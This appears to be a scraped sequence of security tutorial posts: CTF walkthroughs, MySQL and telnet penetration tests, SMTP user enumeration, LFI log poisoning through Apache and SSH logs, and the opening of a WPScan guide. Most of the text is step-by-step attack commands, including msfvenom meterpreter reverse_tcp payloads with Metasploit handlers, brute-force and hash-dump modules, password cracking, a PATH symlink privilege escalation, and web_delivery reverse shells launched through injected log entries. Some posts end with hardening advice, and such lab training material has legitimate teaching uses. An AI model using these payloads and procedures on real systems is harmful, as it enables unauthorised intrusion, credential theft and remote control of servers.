We find a service called agent is running so we find the location of agent using which command
which agent


So we knock the server and find that port 7788 opened.
Knock 192.168.0.25 7482 8279 9467


Now we download agent program file to our system for reverse engineering.
Download agent /root/Desktop


Now we reverse engineer the file to find an exploit. First we disassemble main function.
gdb –q agent
disassemble main



We break the program at 80486ba, and run the program. After running the programs, we look at the memory locations associated with the program.
break *0x80486ba
info registers


We look inside four halfwords of memory above stack pointer
x/4xw 0xffffd340


In the memory address 804c070 we found the password to access the program.
x/s 0x0804c070


Now we access the program from the server using netcat and find that the string can give us access to the program
netcat 192.168.0.25 7788


Now we create an exploit for this program, first we create a shellcode for msfvenom payload.
msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 –f python –b \x00\xa0\x0d


Now we create our exploit using python. We manually fuzz the memory location inside our exploit.


We setup our handler on metesploit and execute the shell.
msf > use exploit/multi/handler
msf exploit (handler) > set payload linux/x86/meterpreter/reverse_shell
msf exploit (handler) > set lhost 192.168.0.15
msf exploit (handler) > set lport 4444
msf exploit (handler) > run


now we check for sessions and take the interactive shell
msf exploit (handler) > sessions
msf exploit (handler) > sessions –I 3


Now we take shell check our privileges, we find that we are root. When we move inside the /root/ folder we find our 6thand final flag.



Hack the thewall VM (CTF Challenge)

$
0
0
Hello friends! Today we are going to take another CTF challenge known as thewall. The credit for making this vm machine goes to “Xerubus” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.17 but you will have to find your own)
netdiscover


We did a nmap scan but it showed nothing. So we use arp to check if it is broadcasting anything.

arp –an


We found that it is broadcasting something on the network, so we use wireshark to check at which port it is broadcasting the data.
We found that it is broadcasting something at port 1337 so we use netcat to listen at port 1337.
nc –lvp 1337


We found it was broadcasting something related to pink Floyd, we again do a nmap scan to check if it affected anything.
nmap -sV 192.168.0.17

As we can see that port 80 is open, so we open this ip in our browser.


We take a look at the source code of the browser and find a hexadecimal encoded string.


When we decode it we find a md5 encoded string and hint to do stegnography.


We decode the md5 encoded string and found a string called divisionbell


We download the image from the webpage and using steghide we check if something is hidden behind the image. When try to extract information it prompts for password using the string we decoded above we are able to find that a text file is hidden behind the image and are able to extract it.
steghide –info pink_floyd.jpg
steghide extract –sf pink_floyd.jpg


When we open the text file we find a base64 encoded string and md5 encoded string and a hint to use it at port 1965.


First we decode the base64 encoded string and found the string SydBarret.


Then we decode the md5 encoded string and found the string pinkfloydrocks.


Port enumeration on 1965 shows it is running openssh, we check if we can login using this as username:SydBarret and password:pinkfloydrocks.


When we try to login it shows us that we can only connect through sftp. So we use SydBarrettas username and pinkfloydrocks as password to login through sftp.


Now that we are inside, we find a file called eclipsed_by_the_moon, we download it to our system



We check what kind of file it is, we find that it is a zip file, we extract it using tar.
file eclipsed_by_the_moon
tar xvfz eclipsed_by_the_moon


After extracting the file, we check what kind of file it is and find that it is a boot sector.
file eclipsed_by_the_moon.lsd


We check if we can recover any file inside the boot sector using testdisk.
testdisk eclipsed_by_the_moon.lsd
We select the image to recover files from.


We select none portioned media as it is a boot sector.


We go to advanced to recover file from the image.


We then select the partition in which we want to extract the file from and select undelete to recover the files.


We find that an image file is recovered, we copy it.


We select the directory of our system in which we want to copy the file.


We check the image we just recovered and find the picture of Roger Waters, we also got a password inside the image.


We login trough ssh, enumerating the username we find that RogerWaters is the username and password is hello_is_there_anybody_in_there.
After getting in, we find that there are different directory for different users of pink floyd band members.
ls -al


We also find that we have limited access and cannot access their directories so we check for binaries available to other users and find that user NickMasonand DavidGilmour have binaries called brick and shineon available to them.
find / -user DavidGilmour 2>/dev/null
find / -user NickMason 2>/dev/null


We don’t have access to run the binary shineon but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.


Now we can access the directory NickMason/. We find an image file inside we use scp to send it to our local system.
scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop


We check the file type and find that it is an audio file. We change the file from .jpg to .ogg


When we listen to the audio, we find that morse code is also playing in the background along with the music. We cut the frequency of the audio to retrieve the morse code.


.-. .. -.-. …. .- .-. -.. .-- .-.  .. --. …. - .---- ----. ….- …-- ..-. .. … .-
We find that the morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to login as user RichardWright.


Now we try to run the binary shineon, after running the binary we find that we can change the folder with symbolic link from DavidGilmour to RichardWright.
ln –s /bin/ksh /tmp/mail
export PATH:/tmp:$PATH
When we now run the shineon we become user DavidGilmour.


Inside DavidGilmour/folder we find a link inside the file.


When we open this link on the browser we find an image on which something is written.



When we decrease the contrast of the image, we find a hexadecimal string.


Then we also send the image file that we find inside the DavidGilmour/ folder using scp.
scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/


We then find strings inside the image file and found string who_are_you_and_who_am_i.


Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.


We now are in welcometothemachine group; we move inside /var/www/htdocs/welcometothemachine/.


We find a file called PinkFloyd, we run the file and find it asks a question. We use the hexadecimal string inside the image we find on the webpage.


Now we are given the permission to get root, as DavidGilmour is added into sudoers after running this program.


Now when we enter root/ directory and we find the flag stating the end of the VM challenge.



MySQL Penetration Testing with NMAP

$
0
0
In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

Scanning for port 3306

open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.
Nmap –sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it


Retrieve mysql information
Now type another command to retrieve mysql information such as version, protocol and etc:

Nmap –script=mysql-info 192.168.1.216


Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt as shown in given below image.


Brute force attack
This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

Nmap –p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.


Retrieve mysql user names
This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.
Nmap –p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.


Retrieve database names
This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.
Nmap –p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can read the name of created database such as ignite


This command will also perform same task as above but retrieve database name using mysql query “show database”

Nmap –p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

From given below image you can read the name of created database such as ignite


Retrieve mysql variable status ON/OFF
When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.
This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.


Retrieve Hash password
This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.
Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.

Penetration Testing on MYSQL (Port 3306)

$
0
0
Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In our previous article we had already discussed how to configure of mysql in ubuntu which you can read from here, now moving towards for its penetration testing.

Attacker: kali Linux
Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MYSQL
Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.
Here we are using nmap for scanning port 3306. 
nmap -sT 192.168.1.216

If service is activated in targeted server then nmap show open STATE for port 3306.


Enumerating MYSQL Banner
An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.
Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for MYSQL version.

use auxiliary/scanner/mysql /mysql _version
msf auxiliary(mysql_version) > set rhosts 192.168.1.216
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > run

From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.


MYSQL Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.216
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.



From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.


Stealing MYSQL information using metasploit
This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.
use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set rhost 192.168.1.216
msf auxiliary(mysql_sql) > set username root
msf auxiliary(mysql_sql) > set password toor
msf auxiliary(mysql_sql) > set SQL show databases;
msf auxiliary(mysql_sql) > run

From given image you can observe that it has executed the sql query for dumping the name of databases.


This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump
msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216
msf auxiliary(mysql_schemadump) >set username root
msf auxiliary(mysql_schemadump) >set password toor
msf auxiliary(mysql_schemadump) >run

here it has dump the information schema for database “ignite” with table name “student” , 5 columns name with column types:

DB: ignite
Table name:student

Last Name
(varchar 30)
First Name
(varchar 30)
Student ID
(int 11)
Major
(varchar 20)
Dorm
(varchar 20)


Check file privileges
Open my.cnf file to verify file privileges using following command:
gedit /etc/mysql/my.cnf


Here you can see given below statements are uncommented
·         Mysqld_safe
·         Mysqld
·         Secure_file _priv
If these statements are uncommented then it becomes very easy for attacker to perform file enumeration.


Mysql File Eumeration
This module will enumerate files and directories using the MySQL load_file feature.

Use auxiliary/scanner/mysql/mysql_file_enum
msf auxiliary(mysql_file_enum) > setrhosts 192.168.1.216
msf auxiliary(mysql_file_enum) > set username root
msf auxiliary(mysql_file_enum) > set password toor
msf auxiliary(mysql_file_enum) > set DIR_LIST/root/Desktop/file.txt
msf auxiliary(mysql_file_enum) > run

Here it will start identifying whether the given files list is exist in the target system or not.
From given image you can observe that it has found /etc, /var, /var/www such directory exists.



Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs
msf auxiliary(mysql_writable_dirs) > setrhosts 192.168.1.216
msf auxiliary(mysql_writable_dirs) > set username root
msf auxiliary(mysql_writable_dirs) > set password toor
msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt
msf auxiliary(mysql_writable_dirs) > run

Here we had assign a list of files so that we can identify the writable directory and from given image you can observe that it has found writable permission only for /tmp.


Mysql User Enumeration
This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > set rhost 192.168.1.216
msf auxiliary(mysql_enum) > set username root
msf auxiliary(mysql_enum) > set password toor
msf auxiliary(mysql_enum) > run

It will start retrieving information such as list of other user account and user privileges on mysql server.


From given image it will be clear to you, that it has shown list of account with hash password and list of user who have GRANT privileges.
As you can see other than user root it has some more user such as sr with hash password, here you can crack this password using password cracker tool.


This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.
use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216
msf auxiliary(mysql_hashdump) > set username root
msf auxiliary(mysql_hashdump) > set toor
msf auxiliary(mysql_hashdump) > exploit

Now from screenshot you can see the hash value of password is given for all users. Metasploit store these hash value inside /tmp folder and later use jonh the ripper for cracking password. 


This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mysql_fast
 msf auxiliary(jtr_mysql_fast) >options
msf auxiliary(jtr_mysql_fast) >run

By default it will use metasploit wordlist where hash value has been saved and start cracking hash value.


If you notice the given below image you can perceive that it has successfully crack the double SHA-1 hashing and decrypt the password into plain text.


Now using above retrieved credential you can try to login into mysql server.


Here you can see we had successfully login into server. Hence attacker can easily breach the security of server and steal the important information or modify it.


Secure MYSQL through port forwarding
In order to secure mysql server admin can forward port from default to specific port to run the service. Open my.conf file using following command for making changes:
gedit /etc/mysql/my.conf


Now change port 3306 into any other port such as 3000 as shown in given image and save the changes and restart the service.
service mysql restart


Verify it using nmap command as given below:
nmap –sT 192.168.1.216


Prevent Mysql against brute force attack
In order to secure mysql server admin can bind the service to its localhost. Open my.conf file using following command for making changes:
gedit /etc/mysql/my.conf


Only you need to enable nind-address by making it uncomment  as shown in given images.
service mysql rstart


Now let’s verify it by making brute force attack same as above using dictionary.
Great!!Attacker is not able to connect the server which resists brute attack also as shown in given image.


Admin should GRANT all privilege to a specific user only with specific IP address which prevents database information alteration from attackers.
Now for granting all privileges; login into mysql server and type following query:
Mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’ WITH GRANT OPTION;
To tell the server to reload the grant tables, perform a flush-privileges operation
Mysql > flush privileges;


Penetration Testing on Telnet (Port 23)

$
0
0
Welcome to Internal penetration testing on telnet server where you will learn telnet installation and configuration, enumeration and attack, system security and precaution.  

From Wikipedia

 Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!
Requirement
Telnet Server: ubuntu
Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing telnet server is very simple, it will get activated by following three steps:
1)      Open the terminal in ubuntu and type given below command with root access.
apt-get install xinted telnet



1    Open ineted.conf file add given below statement inside it, then save it.

gedit /etc/inetd.conf
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd


     Now open xibetd.conf and add following line for configuration setting and save it.
gedit /etc/xinetd.conf
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/
defaults
{
# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info
instances = 60
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
cps = 25 30
}
includedir /etc/xinetd.d


Now execute following command to restart the service.
sudo /etc/init.d/xinetd restart


Now you can ensure whether telnet service is getting activated or not and for this we had scan our own system with nmap.
nmap –p 23 127.0.0.1
If service is activated in targeted server then nmap show open STATE for port 23.



SSH Banner grabbing through telnet
A telnet play an important role in banner grabbing of other service running on target system. Open the terminal in kali Linux and type following command for finding the version of SSH service running on targeted machine.

telnet 192.168.0.106 22

From given image you can observe that it has successfully shown the SSH version “2.0-openSSH_6.6.1p1”has been installed on target machine.

SMTP Banner grabbing through telnet
Similarly we can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.
telnet 192.168.0.25 25
From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.
You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:
If you received message code 250,251,252 which means server has accept the request and user account is valid.
But if you received message code 550 it means invalid user account as shown in given image
vrfy raaz@mail.ignite.lab


Telnet Banner Grabbing through Metasploit

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for TELNET version.
use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 192.168.0.106
msf auxiliary(telnet_version) > set rport 23
msf auxiliary(telnet_version) >set threads 5
msf auxiliary(telnet_version) > exploit

From given image you can read the highlighted text which is showing the installed version of TELNET on target’s system.



Brute Force Attack
An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.106
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
From given image you can observe that our TELNET server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login simultaneously it has opened victims command shell as session 1.

From given image you can see now we have unauthorized access on victim’s system as raj@igniteand executed ifconfig to verify the network interface.


We can also convert command shell into meterpreter shell using following command

sessions –u 1
From given image you can see that now we are having two sessions; 1st for command shell session and 2nd for meterpreter session.


Stealing credential through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), and so it is often feasible to eavesdrop on the communications and use the password later for malicious purposes; anybody who has access the network between the two hosts where Telnet is being used can intercept the packets passing between source and destination and obtain login, password and data information.

From given image you can observe that here the client is login into telnet server by submitting valid credential on other hand attacker is sniffing network packet using wireshark  or other tools.


Here you can notice wireshark had captured telnet information by sniffing the network. It follow similar protocol as FTP where telnet users may authenticate themselves with a clear-text sign-in protocol for username and password. As result attacker can esaly sniff login credential.


From given below image you can read the username: raj and password: 123 moreover complete information travelling through packet between source to destination.

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore in favor of that the Secure Shell (SSH) protocol, first released in 1995 in replaced of Telnet.


Secure Telnet through Port forwarding
In order to secure telnet server admin can forward port from default to specific port to run the service. Open services file using following command for making changes:
gedit /etc/services

From given image you can perceive that telnet default uses port 23 for its services; change the port number for telnet service.


 From given below image you can compare that we had changed port 23 with 2323, now restart the service.
service xinetd restart


Verify it using nmap command as given below:
nmap –p 2323 –sV 192.168.0.106


Secure telnet against brute force attack
You can secure telnet server against brute force and from unauthorized access by adding filter using Iptable. Allow only specific IP address to establish connection with telnet server and reject or drop the connection from other IP addresses.
Now type following command with root permission to add filter for telnet in iptables.

Iptables –A INPUT –s 192.168.0.104 –p tcp –dport 23 –j ACCEPT
Above command will allow the traffic from IP address 192.168.0.104 to access the telnet service on port 23.

Iptables –A INPUT –p tcp –dport 23 –j DROP
Above command with drop the service for traffic coming from other IP addresses on port 23.

Restart the service once you add filter in iptables
sudo /etc/init.d/xinetd restart


Let verify the working of Ipatble by connecting to telnet server from client machine holding IP address 192.168.0.104.
Great!!Connection established successfully.
You can confirm it from given below image.


Let verify the working of Ipatble by connecting to telnet server from attacker machine holding different IP address.
From given below image you can see nothing is happing here because port 23 is down for all other IP addresses

Awesome!! It means if attacker sniff the valid credential then also will not able to access the telnet server.


4 ways to SMTP Enumeration

$
0
0
We can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

Telnet

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.
You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:
If you received message code 250,251,252 which means server has accept the request and user account is valid.
But if you received message code 550 it means invalid user account as shown in given image

vrfy admin@mail.ignite.lab


Metasploit
The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of user’s aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
msf auxiliary(smtp_enum) > exploit


From given image you can read the valid username found in targeted server as well as it also grab SMTP banner.


smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Type following command to enumerate username using dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107
 -M: mode Method to use for username guessing EXPN, VRFY or RCPT 
 -U: file File of usernames to check via smtp service
 -t: host Server host running smtp service

From given image you can see out of total 7 queries only 5 names are valid and exist in smtp server.


Type following command to verify user email address on mail server:
smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107
-D: dom   Domain to append tosupplied user list to make email addresses;Use this option when you want to guess valid email addresses instead of just usernames.

From given image you can see it has shown raj@mail.ignite.lab is valid email ID for user raj.


iSMTP is the kali Linux toolw which is use for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.
Type following command to enumerate valid email ID of targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h       The target IP and port (IP:port)
 -e   Enable SMTP user enumeration testing and imports email list.

From given image you can see blue color text refer to valid email account and red color text refer to invalid account.

Log Poisoning through LFI

$
0
0
In this article we are demonstrating how a PHP file with include function can lead to LFI log injection attack in any web server. Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)and “Configure Web Server for Penetration Testing (Beginner Guide) that will help you in configuration of own web server as well as more about LFI vulnerability.

Attacker: Kali Linux
Target: ubuntu

Create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC. Download File from Here

Now I had saved given below PHP code inside a text file as lfi.php and saved on desktop.


Now login with user as “root” and create a folder “lfi” inside /var/www/html
cd /var/www/html
mkdir lfi
Move lfi.php file from desktop to /var/www/html using given below command.
mv /home/raj/Desktop/lfi.php .

Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring following URL to read password files:

Localhost/lfi/lfi.php?file=/etc/passwd

From given image you can observe that above URL has dumped following result shown below.


Now I will try to open Apache access.log file through lfi.php on browser therefore give read permission to apache2 and then include the access.log file.

Now to include the acess.log file as file parameter and give following URL inside browser.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

From given image you can see it is showing created apache logs in browser. Now turn on burp suite to capture the request of same web page.

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.
Add cmd comment  inside user_Agent and send the request with GET parameter  /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as shown in the below image. Then click on forward.
Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.
In same manner execute ifconfigthrough cmd to verify network interface or can browse following url and view the result from inside the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
If you found such kind of vulnerability in any web application then you can use metasploit platform to exploit web server.

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

 use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104 
msf exploit (web_delivery)>set srvport  8081
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

 Paste the above copied malicious code inside URL as shown in given image and execute it as command.
When above code gets execute you will get meterpreter session 1.

msf exploit (web_delivery)>session –I 1
meterpreter> sysinfo











Hack the Primer VM (CTF Challenge)

$
0
0
Hello friends! Today we are going to take another CTF challenge known as Primer. The credit for making this vm machine goes to “couchsofa” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.115 but you will have to find our own)

netdiscover

nmap -sV  192.168.1.115


We found port 80 is open so we open this ip address in our browser.


dirb http://192.168.1.115/ -w


Inside the robots.txt we find a link to a page.


We open this link, it leads to page that has a story written on it.


We take a look at the source code at the and found another link.


When we open the link we found a link on the page.


When we open the link we are prompted for a password.


We capture the request of this page in burpsuite and and send it to repeater. In the response from the server, we find another link.


When we open the link we find another page that prompts for password.


Now we take a look at the url, it looks like md5 so we removed the first and underscore we find something interesting.


We find that the url are actually prime numbers converted into md5 hashes. We were at the 7 page, and the hash to that is 17. So we convert 19(next prime number) to md5 hash.




We take a look at the source code and find another url.


We open it and find a custom made terminal that uses javascript to execute certain commands.


In the ~/usr/falken/ folder we find a hint, when we take a look at the processes we find a command that we need to run.


When we run connect falken@Erebus It prompts for password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth i 6th august 1984. We use cupp to create a dictionary file.


We use burpsuite to bruteforce the password, we find that joshua1984 is the password.


When we login, we find a page again with terminal.




There we find our next clue, we googled trivial zero and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.




When we login we are again prompted with another terminal.

When we look through the files we find the md5 encoded string for the usernames. We check for processes and again find a command.


When we crack the md5 password, we find that these are password for the respective username.

When we login, we are again prompted with another terminal.


Looking through the files we find username, password and hostname.


We use these to login and find a page greeting us for completing challenge.


RCE with LFI and SSH Log Poisoning

$
0
0
In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)” that will help you in configuration of own web server as well as more about LFI vulnerability.

Attacker: Kali Linux
Target: Ubuntu

Let’s Begin!!

Create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC. Download File from Here

I had saved given below PHP code inside a text file as lfi.php and saved on desktop.
Now login with user as “root” and create a folder “lfi” inside /var/www/html
cd /var/www/html
mkdir lfi
Move lfi.php file from desktop to /var/www/html using given below command.
mv /home/raj/Desktop/lfi.php .

Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring following URL to read password files:

localhost/lfi/lfi.php?file=/etc/passwd
From given image you can observe that above URL has dumped following result shown below.

Open terminal in your kali Linux and connect the target through SSH service
 From screenshot you can see I am connected with target system.


Type following command to view its logs:
tail -f /var/log/auth.log
 From given below image you can check the details of generated logs for auth.log file.


Now I will try to openauth.log.log file through lfi.php on browser therefore give read and write permission to auth.log.
cd /var/log/
chmod 775 auth.log


Now to include the auth.log file as file parameter and give following URL inside browser.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
From given image you can see it is showing created auth logs in browser also. 



Since the auth.log file generates log for every success and failed login attempt when we try to connect with web server. Taking advantage of this feature now I will send malicious PHP code as fake user and it will get added automatically in auth.log file as new log.
ssh ’@192.168.1.129

Again when you will check its log, you will find the PHP code has been added as new log.
Type following command to view its logs:
tail -f /var/log/auth.log


Here it will dump the data of auth log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log &c=ifconfig


If you found such kind of vulnerability in any web application then you can use metasploit platform to exploit web server.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport  8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.


When above code gets execute you will get meterpreter session 1 of targeted web server.
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo



Wordpress Penetration testing using WPScan & Metasploit

$
0
0
In our previous article we had discussed “WordPress Penetration Testing Lab Setup in Ubuntu” and today you will learn wordpress penetration testing using WPSCAN and METASPLOIT.

Attacker:Kali Linux
Target:Wordpress 

WPScan is a black box vulnerability scanner for WordPress written in PHP mainly focus on different types of vulnerability in WordPress, WordPress themes, and plugins. Well, WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScanuses the database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) during testing against the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:
Detect a version of currently installed WordPress.
-Can detect sensitive files like readme, robots.txt, database replacing files, etc.
-Detect enabled features on currently installed WordPress.
-Enumerate theme version and name.
-Detect installed plugins and can tell you if it is outdated or not.
-Enumerate user names also.

Let’s start.

Go to your Kali Linux terminal and type following to download wpscan from git hub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git


./wpscan.rb –h

Using default Option we will are going to penetrate our wordpress website:
e             or –enumerate option use for Enumeration.
u        usernames from id 1 to 10
 u[10-20] usernames from id 10 to 20 (you must write [] chars)
 p        plugins
 vp       only vulnerable plugins
ap       all plugins (can take a long time)
 tt       timthumbs
  t        themes
  vt       only vulnerable themes
  at       all themes (can take a long time)


Wpscan is a great tool to scan wordpress websites. Now we will try to do some basic scan, we will use enumerate tools to find information about themes, plugins, usernames etc.

Now type following command to scan wordpress and its server:
./wpscan.rb –u http://192.168.0.101/wordpress/
Instead of http://192.168.0.101/wordpress/ type the name of a website you want to scan. 

